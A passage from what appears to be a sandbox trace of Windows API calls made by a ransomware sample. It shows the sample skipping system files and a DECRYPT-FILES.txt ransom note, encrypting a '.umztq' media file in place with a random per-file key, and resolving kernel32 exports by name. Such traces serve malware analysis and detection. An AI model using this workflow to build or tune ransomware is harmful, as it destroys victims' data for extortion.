param_1="C:\\Users\\Public\\Recorded TV\\Sample Media\\\\DECRYPT-FILES.txt") returned 59 [0186.807] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\recorded tv\\sample media\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.807] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned 41 [0186.807] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media\\*") returned="C:\\Users\\Public\\Recorded TV\\Sample Media\\*" [0186.807] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xf20dc000, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf20dc000, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0186.808] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.808] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xf20dc000, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf20dc000, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.808] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.808] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.808] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf20dc000, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf20dc000, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf20dc000, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0186.808] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0186.808] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0186.808] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0186.808] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0186.808] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0186.808] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0186.808] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0186.808] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0186.808] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0186.808] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0186.808] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.808] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0186.808] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0186.808] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0186.808] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0186.808] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned 41 [0186.808] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.808] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Public\\Recorded TV\\Sample Media\\" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned="C:\\Users\\Public\\Recorded TV\\Sample Media\\" [0186.808] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media\\0a16c9.tmp") returned="C:\\Users\\Public\\Recorded TV\\Sample Media\\0a16c9.tmp" [0186.808] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.809] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\0a16c9.tmp" (normalized: "c:\\users\\public\\recorded tv\\sample media\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.809] CloseHandle (hObject=0x0) returned 0 [0186.809] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.809] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb170cba0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb170cba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb170cba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.809] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.809] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0xab, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.809] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.809] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.809] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.809] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.809] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xb1948040, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x940108, dwReserved0=0x0, dwReserved1=0x0, cFileName="win7_scenic-demoshort_raw.wtv.umztq", cAlternateFileName="WIN7_S~1.UMZ")) returned 1 [0186.809] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv.umztq", lpString2="DECRYPT-FILES.txt") returned 1 [0186.809] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv.umztq", lpString2="autorun.inf") returned 1 [0186.809] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv.umztq", lpString2="boot.ini") returned 1 [0186.809] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv.umztq", lpString2="desktop.ini") returned 1 [0186.809] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv.umztq", lpString2="ntuser.dat") returned 1 [0186.809] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv.umztq", lpString2="iconcache.db") returned 1 [0186.809] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv.umztq", lpString2="bootsect.bak") returned 1 [0186.809] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv.umztq", lpString2="ntuser.dat.log") returned 1 [0186.809] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv.umztq", lpString2="thumbs.db") returned 1 [0186.809] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv.umztq", lpString2="Bootfont.bin") returned 1 [0186.809] lstrlenW (lpString="win7_scenic-demoshort_raw.wtv.umztq") returned 35 [0186.809] lstrcmpiW (lpString1="umztq", lpString2="lnk") returned 1 [0186.809] lstrcmpiW (lpString1="umztq", lpString2="exe") returned 1 [0186.809] lstrcmpiW (lpString1="umztq", lpString2="sys") returned 1 [0186.809] lstrcmpiW (lpString1="umztq", lpString2="dll") returned 1 [0186.810] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned 41 [0186.810] lstrlenW (lpString="win7_scenic-demoshort_raw.wtv.umztq") returned 35 [0186.810] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Public\\Recorded TV\\Sample Media\\" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned="C:\\Users\\Public\\Recorded TV\\Sample Media\\" [0186.810] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpString2="win7_scenic-demoshort_raw.wtv.umztq" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.umztq") returned="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.umztq" [0186.810] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.810] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.umztq" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.umztq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.810] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe0b0 | out: lpFileSize=0x36fe0b0*=9699592) returned 1 [0186.810] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0186.810] ReadFile (in: hFile=0x264, lpBuffer=0x36fe0bc, nNumberOfBytesToRead=0x108, lpNumberOfBytesRead=0x36fe0b8, lpOverlapped=0x0 | out: lpBuffer=0x36fe0bc*, lpNumberOfBytesRead=0x36fe0b8*=0x108, lpOverlapped=0x0) returned 1 [0186.811] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.811] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0186.811] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0186.811] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36fe0b0*, pdwDataLen=0x36fe09c*=0x28, dwBufLen=0x100 | out: pbData=0x36fe0b0*, pdwDataLen=0x36fe09c*=0x100) returned 1 [0186.811] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x3000, flProtect=0x4) returned 0x3930000 [0186.812] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x3000, flProtect=0x4) returned 0x3a30000 [0186.812] ReadFile (in: hFile=0x264, lpBuffer=0x3930000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x36fe094, lpOverlapped=0x0 | out: lpBuffer=0x3930000*, lpNumberOfBytesRead=0x36fe094*=0x100000, lpOverlapped=0x0) returned 1 [0186.844] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0186.844] WriteFile (in: hFile=0x264, lpBuffer=0x3a30000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x36fe098, lpOverlapped=0x0 | out: lpBuffer=0x3a30000*, lpNumberOfBytesWritten=0x36fe098*=0x100000, lpOverlapped=0x0) returned 1 [0186.846] ReadFile (in: hFile=0x264, lpBuffer=0x3930000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x36fe094, lpOverlapped=0x0 | out: lpBuffer=0x3930000*, lpNumberOfBytesRead=0x36fe094*=0x100000, lpOverlapped=0x0) returned 1 [0186.874] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0186.874] WriteFile (in: hFile=0x264, lpBuffer=0x3a30000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x36fe098, lpOverlapped=0x0 | out: lpBuffer=0x3a30000*, lpNumberOfBytesWritten=0x36fe098*=0x100000, lpOverlapped=0x0) returned 1 [0186.877] ReadFile (in: hFile=0x264, lpBuffer=0x3930000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x36fe094, lpOverlapped=0x0 | out: lpBuffer=0x3930000*, lpNumberOfBytesRead=0x36fe094*=0x100000, lpOverlapped=0x0) returned 1 [0186.902] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0186.902] WriteFile (in: hFile=0x264, lpBuffer=0x3a30000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x36fe098, lpOverlapped=0x0 | out: lpBuffer=0x3a30000*, lpNumberOfBytesWritten=0x36fe098*=0x100000, lpOverlapped=0x0) returned 1 [0186.905] ReadFile (in: hFile=0x264, lpBuffer=0x3930000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x36fe094, lpOverlapped=0x0 | out: lpBuffer=0x3930000*, lpNumberOfBytesRead=0x36fe094*=0x100000, lpOverlapped=0x0) returned 1 [0186.922] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0186.922] WriteFile (in: hFile=0x264, lpBuffer=0x3a30000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x36fe098, lpOverlapped=0x0 | out: lpBuffer=0x3a30000*, lpNumberOfBytesWritten=0x36fe098*=0x100000, lpOverlapped=0x0) returned 1 [0186.925] ReadFile (in: hFile=0x264, lpBuffer=0x3930000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x36fe094, lpOverlapped=0x0 | out: lpBuffer=0x3930000*, lpNumberOfBytesRead=0x36fe094*=0x100000, lpOverlapped=0x0) returned 1 [0186.952] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0186.952] WriteFile (in: hFile=0x264, lpBuffer=0x3a30000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x36fe098, lpOverlapped=0x0 | out: lpBuffer=0x3a30000*, lpNumberOfBytesWritten=0x36fe098*=0x100000, lpOverlapped=0x0) returned 1 [0186.955] ReadFile (in: hFile=0x264, lpBuffer=0x3930000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x36fe094, lpOverlapped=0x0 | out: lpBuffer=0x3930000*, lpNumberOfBytesRead=0x36fe094*=0x100000, lpOverlapped=0x0) returned 1 [0186.979] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0186.979] WriteFile (in: hFile=0x264, lpBuffer=0x3a30000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x36fe098, lpOverlapped=0x0 | out: lpBuffer=0x3a30000*, lpNumberOfBytesWritten=0x36fe098*=0x100000, lpOverlapped=0x0) returned 1 [0186.982] ReadFile (in: hFile=0x264, lpBuffer=0x3930000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x36fe094, lpOverlapped=0x0 | out: lpBuffer=0x3930000*, lpNumberOfBytesRead=0x36fe094*=0x100000, lpOverlapped=0x0) returned 1 [0186.995] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0186.995] WriteFile (in: hFile=0x264, lpBuffer=0x3a30000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x36fe098, lpOverlapped=0x0 | out: lpBuffer=0x3a30000*, lpNumberOfBytesWritten=0x36fe098*=0x100000, lpOverlapped=0x0) returned 1 [0186.997] ReadFile (in: hFile=0x264, lpBuffer=0x3930000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x36fe094, lpOverlapped=0x0 | out: lpBuffer=0x3930000*, lpNumberOfBytesRead=0x36fe094*=0x100000, lpOverlapped=0x0) returned 1 [0187.009] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0187.009] WriteFile (in: hFile=0x264, lpBuffer=0x3a30000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x36fe098, lpOverlapped=0x0 | out: lpBuffer=0x3a30000*, lpNumberOfBytesWritten=0x36fe098*=0x100000, lpOverlapped=0x0) returned 1 [0187.011] ReadFile (in: hFile=0x264, lpBuffer=0x3930000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x36fe094, lpOverlapped=0x0 | out: lpBuffer=0x3930000*, lpNumberOfBytesRead=0x36fe094*=0x100000, lpOverlapped=0x0) returned 1 [0187.022] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0187.022] WriteFile (in: hFile=0x264, lpBuffer=0x3a30000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x36fe098, lpOverlapped=0x0 | out: lpBuffer=0x3a30000*, lpNumberOfBytesWritten=0x36fe098*=0x100000, lpOverlapped=0x0) returned 1 [0187.025] ReadFile (in: hFile=0x264, lpBuffer=0x3930000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x36fe094, lpOverlapped=0x0 | out: lpBuffer=0x3930000*, lpNumberOfBytesRead=0x36fe094*=0x40108, lpOverlapped=0x0) returned 1 [0187.033] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0xfffbfef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0187.033] WriteFile (in: hFile=0x264, lpBuffer=0x3a30000*, nNumberOfBytesToWrite=0x40108, lpNumberOfBytesWritten=0x36fe098, lpOverlapped=0x0 | out: lpBuffer=0x3a30000*, lpNumberOfBytesWritten=0x36fe098*=0x40108, lpOverlapped=0x0) returned 1 [0187.034] ReadFile (in: hFile=0x264, lpBuffer=0x3930000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x36fe094, lpOverlapped=0x0 | out: lpBuffer=0x3930000*, lpNumberOfBytesRead=0x36fe094*=0x0, lpOverlapped=0x0) returned 1 [0187.034] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.034] WriteFile (in: hFile=0x264, lpBuffer=0x36fe0b0*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fe098, lpOverlapped=0x0 | out: lpBuffer=0x36fe0b0*, lpNumberOfBytesWritten=0x36fe098*=0x108, lpOverlapped=0x0) returned 1 [0187.034] VirtualFree (lpAddress=0x3930000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.039] VirtualFree (lpAddress=0x3a30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.043] CloseHandle (hObject=0x264) returned 1 [0187.044] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.044] GetTickCount () returned 0x1135fdc [0187.044] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0187.044] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0187.044] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0187.044] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0187.045] lstrlenA (lpString="kernel32.dll") returned 12 [0187.045] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0187.045] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0187.045] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0187.045] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0187.045] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0187.045] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0187.045] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0187.045] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0187.045] lstrlenA (lpString="ADDATOMA") returned 8 [0187.045] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0187.045] lstrlenA (lpString="ADDATOMW") returned 8 [0187.045] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0187.045] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0187.045] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0187.045] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0187.045] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0187.045] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0187.045] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0187.045] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0187.045] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0187.045] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0187.045] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0187.045] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0187.045] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0187.045] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0187.045] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0187.045] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0187.045] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0187.045] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0187.045] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0187.046] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0187.046] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0187.046] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0187.046] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0187.046] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0187.046] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0187.046] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0187.046] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0187.046] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0187.046] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0187.046] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0187.046] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0187.046] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0187.046] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0187.046] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0187.046] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0187.046] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0187.046] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0187.046] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0187.046] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0187.046] lstrlenA (lpString="BACKUPREAD") returned 10 [0187.046] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0187.046] lstrlenA (lpString="BACKUPSEEK") returned 10 [0187.046] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0187.046] lstrlenA (lpString="BACKUPWRITE") returned 11 [0187.046] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0187.046] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0187.046] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0187.046] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0187.046] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0187.046] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0187.046] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") 